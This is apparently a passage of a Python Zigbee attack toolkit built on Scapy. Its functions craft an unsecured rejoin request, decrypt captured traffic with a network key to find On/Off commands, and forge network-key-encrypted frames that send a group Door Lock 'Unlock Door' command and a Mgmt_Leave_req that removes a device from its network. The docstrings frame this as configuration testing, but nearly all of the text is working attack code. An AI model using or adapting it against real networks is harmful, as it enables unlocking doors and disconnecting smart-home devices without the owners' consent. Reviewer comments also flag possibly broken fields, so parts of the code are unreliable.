def insecure_rejoin(source,
                    destination,
                    pan_id,
                    extended_source,
                    seq_num=0,
                    nwk_seq_num=0):
    """Build an unsecured Zigbee NWK rejoin-request frame.

    The returned packet is ``<802.15.4 data stub> / ZigbeeNWK /
    ZigbeeNWKCommandPayload``. No security flag is set on the NWK header and
    no security header layer is added, so the command travels in the clear.
    Whether a network accepts such a rejoin is a Trust Center policy matter,
    so this frame is useful for checking how a coordinator is configured.

    Args:
        source: Short address of the sender, normalised by ``address()``.
        destination: Short address of the receiver, normalised by
            ``address()``. Only used for the 802.15.4 header; the NWK
            destination is left at the layer's default.
        pan_id: PAN identifier, normalised by ``pan()``.
        extended_source: Extended (64-bit) address of the sender, normalised
            by ``extended_address()`` and placed in the NWK ``ext_src`` field.
        seq_num: Sequence number passed to the 802.15.4 stub.
        nwk_seq_num: Sequence number for the NWK header.

    Returns:
        The stacked packet.
    """
    # Normalise every caller-supplied identifier with the module helpers.
    ext_src = extended_address(extended_source)
    src = address(source)
    dst = address(destination)
    pan_value = pan(pan_id)

    mac_frame = dot15d4_data_stub(seq_num, pan_value, src, dst)

    nwk_header = ZigbeeNWK()
    nwk_header.frametype = 1  # NWK command frame (not data)
    nwk_header.proto_version = 2
    # Only the extended-source flag is raised: the security flag stays clear.
    nwk_header.flags = ['extended_src']
    nwk_header.ext_src = ext_src
    nwk_header.source = src
    nwk_header.radius = 30
    nwk_header.seqnum = nwk_seq_num

    rejoin_cmd = ZigbeeNWKCommandPayload()
    rejoin_cmd.cmd_identifier = 6  # rejoin request
    rejoin_cmd.allocate_address = 1  # capability bit: ask for a short address

    return mac_frame / nwk_header / rejoin_cmd
def is_on_off_frame(f):
    """Report whether *f* decrypts to a group-addressed HA On/Off data frame.

    The frame is decrypted with the key taken from the module-level
    ``args.key`` and the APS header of the result is then inspected.

    Args:
        f: A captured packet that carries a ``ZigbeeSecurityHeader`` layer.
            NOTE(review): indexing a packet without that layer would raise;
            confirm that callers pre-filter for secured frames.

    Returns:
        True when the decrypted APS header shows group delivery, a data
        frame, the Home Automation profile and the On/Off cluster.
    """
    # The sender's extended address is an input to the decrypt helper
    # (presumably for the nonce; confirm in crypto_utils).
    sender_ext_addr = extended_address(f[ZigbeeSecurityHeader].source)

    decrypted = crypto_utils.zigbee_packet_decrypt(args.key, f,
                                                   sender_ext_addr)

    # Look the APS layer up once and test each discriminating field.
    aps = decrypted[ZigbeeAppDataPayload]
    return (aps.delivery_mode == 3          # group addressing
            and aps.aps_frametype == 0      # data frame
            and aps.profile == 0x0104       # Home Automation
            and aps.cluster == 0x0006)      # On/Off
def encrypted_unlock(panid,
                     source,
                     destination,
                     extended_source,
                     key,
                     frame_counter=0,
                     seq_num=0,
                     nwk_seq_num=0,
                     aps_counter=0,
                     zcl_seq_num=0):
    """Build a network-key-encrypted, group-addressed ZCL command frame.

    The APS header targets cluster 0x0101 in profile 0x0104 (Home Automation)
    with group address 0x0005 and a broadcast destination endpoint; the ZCL
    part is a cluster-specific frame carrying command identifier 1. In the
    ZCL specification cluster 0x0101 is Door Lock and command 0x01 is Unlock
    Door, which matches the function name.

    The APS/ZCL bytes are handed to ``crypto_utils.zigbee_packet_encrypt``
    together with the cleartext 802.15.4 / NWK / security-header prefix.
    A receiver can only be made to act on the result if ``key`` is the
    network key in use and ``frame_counter`` passes its freshness check, so
    those two values are what protect a deployed lock against this frame.

    Args:
        panid: PAN identifier, normalised by ``pan()``.
        source: Short address of the sender, normalised by ``address()``.
        destination: Short address of the receiver, normalised by
            ``address()``.
        extended_source: Extended address of the sender; used in the security
            header and, as bytes, by the encrypt helper.
        key: Key passed to ``crypto_utils.zigbee_packet_encrypt``.
        frame_counter: Frame counter placed in the security header.
        seq_num: Sequence number for the 802.15.4 stub.
        nwk_seq_num: Sequence number for the NWK stub.
        aps_counter: APS counter value.
        zcl_seq_num: ZCL transaction sequence number.

    Returns:
        Whatever ``crypto_utils.zigbee_packet_encrypt`` returns for the
        assembled frame.
    """
    # Normalise the caller-supplied identifiers with the module helpers.
    pan_value = pan(panid)
    src = address(source)
    dst = address(destination)
    ext_src = extended_address(extended_source)

    ext_src_bytes = extended_address_bytes(ext_src)

    # APS header: group-addressed data frame for the target cluster.
    aps = ZigbeeAppDataPayload()
    aps.aps_frametype = 0   # data
    aps.delivery_mode = 3   # group addressing
    aps.frame_control = 4   # NOTE(review): presumably the ack-request flag
    aps.cluster = 0x0101
    aps.profile = 0x0104
    aps.group_addr = 0x0005

    aps.dst_endpoint = 0xff  # Broadcast
    aps.src_endpoint = 1
    aps.counter = aps_counter

    # ZCL header: cluster-specific command 1.
    zcl_cmd = ZigbeeClusterLibrary()
    zcl_cmd.zcl_frametype = 1
    zcl_cmd.transaction_sequence = zcl_seq_num
    zcl_cmd.command_identifier = 1

    to_encrypt = aps / zcl_cmd

    # Everything up to and including the security header stays in the clear.
    mac_frame = dot15d4_data_stub(seq_num, pan_value, src, dst)
    nwk_header = nwk_stub(src, dst, nwk_seq_num)
    sec_header = security_header_stub(ext_src, frame_counter)
    cleartext_prefix = mac_frame / nwk_header / sec_header

    plaintext = bytes(to_encrypt)
    return crypto_utils.zigbee_packet_encrypt(key, cleartext_prefix,
                                              plaintext, ext_src_bytes)
def encrypted_leave_req(panid,
                        source,
                        destination,
                        extended_source,
                        key,
                        frame_counter=0,
                        seq_num=0,
                        nwk_seq_num=0,
                        aps_counter=0,
                        zcl_seq_num=0):
    """Build a network-key-encrypted, unicast ZDP leave-request frame.

    The APS header addresses endpoint 0 with profile 0x0000 and cluster
    0x0034, which in the Zigbee Device Profile is Mgmt_Leave_req. The ZDP
    body has its extended address, remove-children and rejoin values all set
    to 0. The APS/ZDP bytes are handed to
    ``crypto_utils.zigbee_packet_encrypt`` together with the cleartext
    802.15.4 / NWK / security-header prefix.

    As with any NWK-secured frame, a receiver should only act on the result
    when ``key`` is the network key in use and ``frame_counter`` passes its
    freshness check.

    Args:
        panid: PAN identifier, normalised by ``pan()``.
        source: Short address of the sender, normalised by ``address()``.
        destination: Short address of the receiver, normalised by
            ``address()``.
        extended_source: Extended address of the sender; used in the security
            header and, as bytes, by the encrypt helper.
        key: Key passed to ``crypto_utils.zigbee_packet_encrypt``.
        frame_counter: Frame counter placed in the security header.
        seq_num: Sequence number for the 802.15.4 stub.
        nwk_seq_num: Sequence number for the NWK stub.
        aps_counter: APS counter value.
        zcl_seq_num: Used here as the ZDP sequence number, despite the name.

    Returns:
        Whatever ``crypto_utils.zigbee_packet_encrypt`` returns for the
        assembled frame.
    """
    # Normalise the caller-supplied identifiers with the module helpers.
    pan_value = pan(panid)
    src = address(source)
    dst = address(destination)
    ext_src = extended_address(extended_source)

    ext_src_bytes = extended_address_bytes(ext_src)

    # APS header: unicast data frame to the ZDO endpoint.
    aps = ZigbeeAppDataPayload()
    aps.frame_control = 4   # NOTE(review): presumably the ack-request flag
    aps.delivery_mode = 0   # unicast
    aps.aps_frametype = 0   # data
    aps.dst_endpoint = 0
    aps.cluster = 0x0034
    aps.profile = 0x0000
    aps.src_endpoint = 0
    aps.counter = aps_counter

    # NOTE(review): confirm these four names are declared fields of
    # ZigbeeDeviceProfile in the scapy build in use; a name that is not a
    # field would presumably be stored as a plain attribute and never reach
    # the serialised bytes.
    zdp_body = ZigbeeDeviceProfile()
    zdp_body.sequence_number = zcl_seq_num
    zdp_body.extended_address = 0
    zdp_body.remove_children = 0
    zdp_body.rejoin = 0

    to_encrypt = aps / zdp_body

    # Everything up to and including the security header stays in the clear.
    mac_frame = dot15d4_data_stub(seq_num, pan_value, src, dst)
    nwk_header = nwk_stub(src, dst, nwk_seq_num)
    sec_header = security_header_stub(ext_src, frame_counter)
    cleartext_prefix = mac_frame / nwk_header / sec_header

    plaintext = bytes(to_encrypt)
    return crypto_utils.zigbee_packet_encrypt(key, cleartext_prefix,
                                              plaintext, ext_src_bytes)